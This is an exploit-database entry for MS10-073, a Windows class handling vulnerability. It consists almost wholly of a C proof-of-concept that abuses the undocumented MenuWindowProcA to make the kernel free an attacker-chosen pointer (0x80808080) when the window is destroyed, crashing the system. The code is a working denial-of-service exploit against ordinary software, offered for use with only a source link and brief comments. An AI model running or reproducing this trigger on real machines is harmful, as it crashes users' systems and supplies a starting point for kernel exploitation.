MS10-073 Windows Class Handling Vulnerability

2011-01-03T00:00:00
ID 1337DAY-ID-15414
Type zdt
Reporter Tarjei Mandt
Modified 2011-01-03T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #include <windows.h>
 
/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/
 
int main(int argc, char **argv)
{
    WNDCLASSA Class = {0};
    CREATESTRUCTA Cs = {0};
    FARPROC MenuWindowProcA;
    HMODULE hModule;
    HWND hWindow;
 
    Class.lpfnWndProc = DefWindowProc;
    Class.lpszClassName = "Class";
    Class.cbWndExtra = sizeof(PVOID);
 
    RegisterClassA(&Class);
 
    hModule = LoadLibraryA("USER32.DLL");
 
    MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");
 
    hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
 
    // set the pointer value of the (soon to be) popup menu structure
    SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);
 
    // set WND->fnid = FNID_MENU
    MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);
 
    // trigger -> ExPoolFree(0x80808080)
    DestroyWindow(hWindow);
 
    return 0;
}



#  0day.today [2018-03-06]  #